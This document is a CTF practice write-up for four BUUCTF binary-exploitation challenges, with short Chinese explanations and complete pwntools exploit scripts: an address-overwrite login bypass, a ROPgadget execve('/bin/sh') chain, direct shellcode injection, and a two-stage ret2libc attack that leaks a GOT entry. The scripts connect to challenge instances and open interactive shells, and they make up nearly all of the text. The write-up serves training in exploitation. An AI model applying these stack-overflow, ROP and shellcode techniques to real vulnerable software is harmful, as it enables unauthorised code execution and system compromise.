PWN-PRACTICE-BUUCTF-13
- [ZJCTF 2019]Login
- inndy_rop
- mrctf2020_shellcode
- jarvisoj_level1
[ZJCTF 2019]Login
参考:ZJCTF 2019 Pwn
from pwn import *
io=remote('node4.buuoj.cn',27513)   # remote CTF instance; host/port are per-instance
#io = process("./login")            # local variant, kept for debugging
# Hard-coded target address taken from the binary (see the referenced writeup).
# A fixed address like this presumes the binary is loaded without PIE -- TODO confirm.
shell = 0x400e88
# Consume the two prompts the service prints before it reads our input.
io.recvuntil("username: ")
io.sendline("admin")
io.recvuntil("password: ")
# Payload layout: the expected password, 58 NUL bytes, then one little-endian
# 8-byte address (p64).  NOTE(review): what the final 8 bytes land on (offset
# 14 + 58 = 72 from the buffer start) is not visible here -- presumably a
# code pointer the program later uses; confirm against the binary.
# Written for Python 2: str literals are concatenated with the p64() result.
payload="2jctf_pa5sw0rd"+"\x00"*58+p64(shell)
io.sendline(payload)
io.interactive()   # hand the connection over to the user
inndy_rop
静态链接的32位elf,用ROPgadget直接找一条rop链
ROPgadget --binary inndy_rop --ropchain
from pwn import *
from struct import pack
#io=process('./inndy_rop')          # local variant, kept for debugging
io=remote('node4.buuoj.cn',25930)   # remote CTF instance; host/port are per-instance
def ROPchain():
    """Build the ROP payload for the inndy_rop challenge.

    The chain was emitted by ``ROPgadget --binary inndy_rop --ropchain`` (see
    the writeup text above); every gadget address is hard-coded, which only
    works because the binary is statically linked and presumably mapped at a
    fixed address (no PIE) -- confirm with the binary's protections.

    Returns the payload as a string: 0x10 bytes of filler followed by gadget
    addresses and data words, each packed as little-endian 32-bit ('<I').

    NOTE(review): Python 2 only -- the ``'a'*...`` str filler is concatenated
    with ``struct.pack`` output, which is ``bytes`` under Python 3 and would
    raise TypeError there.
    """
    p = 'a'*(0xc+4)                      # 0x10 bytes of filler before the first gadget
    # Store '/bin' at .data.
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea060) # @ .data
    p += pack('<I', 0x080b8016) # pop eax ; ret
    p += '/bin'
    p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    # Store '//sh' at .data + 4.
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea064) # @ .data + 4
    p += pack('<I', 0x080b8016) # pop eax ; ret
    p += '//sh'
    p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    # Store a zero dword at .data + 8 (terminates the string written above).
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea068) # @ .data + 8
    p += pack('<I', 0x080492d3) # xor eax, eax ; ret
    p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    # Load the argument registers: ebx = .data, ecx = edx = .data + 8.
    p += pack('<I', 0x080481c9) # pop ebx ; ret
    p += pack('<I', 0x080ea060) # @ .data
    p += pack('<I', 0x080de769) # pop ecx ; ret
    p += pack('<I', 0x080ea068) # @ .data + 8
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea068) # @ .data + 8
    # eax = 0, then eleven increments (ROPgadget has no 'mov eax, imm' gadget here).
    p += pack('<I', 0x080492d3) # xor eax, eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    # Issue the system call with the registers set above.
    p += pack('<I', 0x0806c943) # int 0x80
    return p
payload=ROPchain()      # layout is documented on ROPchain()
io.sendline(payload)    # sendline appends a newline after the chain bytes
io.interactive()        # hand the connection over to the user
mrctf2020_shellcode
在偏移0x00000000000011DD处有条call rax的gadget,这里的rax就是我们输入内容的地址
于是这道题直接输入shellcode,elf执行call rax即可getshell
from pwn import *
context.arch='amd64'   # pwntools: asm()/shellcraft below emit 64-bit x86 code
context.os='linux'
#io=process('./mrctf2020_shellcode')   # local variant, kept for debugging
io=remote('node4.buuoj.cn',29514)      # remote CTF instance; host/port are per-instance
shellcode=asm(shellcraft.sh())   # pwntools' stock shell-spawning shellcode for context.arch/os
io.recvuntil('magic!\n')   # wait for the prompt before sending anything
# Per the writeup, the binary executes the input buffer directly (call rax).
# NOTE(review): that presupposes the buffer is mapped executable (NX disabled);
# with NX on, the jump into data would fault instead -- confirm with the
# binary's protections.  sendline appends a trailing newline to the bytes.
io.sendline(shellcode)
io.interactive()   # hand the connection over to the user
jarvisoj_level1
32位elf的栈溢出,ret2libc
from pwn import *
#context.log_level = 'debug'        # uncomment to log every byte sent/received
#p = process('./jarvisoj_level1')   # local variant, kept for debugging
p=remote('node4.buuoj.cn',25340)    # remote CTF instance; host/port are per-instance
elf = ELF('./jarvisoj_level1')      # target binary: source of PLT/GOT/symbol addresses
libc=ELF('./libc-2.23-x32.so')      # libc matching the remote service; symbol offsets come from it
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
# Stage 1 (leak): 140 bytes of filler, then write@plt as the new return target,
# main as write's return address (so the program runs again and accepts a second
# overflow), and write's arguments (1, write_got, 4), i.e. write 4 bytes of the
# GOT entry of write to fd 1.  The elf-side addresses are used unrelocated, which
# presumes the binary is not PIE -- only libc is assumed to be randomised here.
# Written for Python 2: str filler is concatenated with p32() output.
payload1='A'*140+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload1)
write_addr = u32(p.recv(4))   # the 4 leaked bytes, decoded little-endian
print('write addr: '+hex(write_addr))
# Stage 2: rebase libc from the leaked address, then resolve system() and a
# "/bin/sh" string inside libc using the matching libc's offsets.
libc_base=write_addr-libc.sym['write']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()   # Python 2 generator method (.next)
# Same 140-byte overflow: system as the return target, 0 as system's own
# return address, and the "/bin/sh" pointer as its single argument.
payload='A'*140+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()   # hand the connection over to the user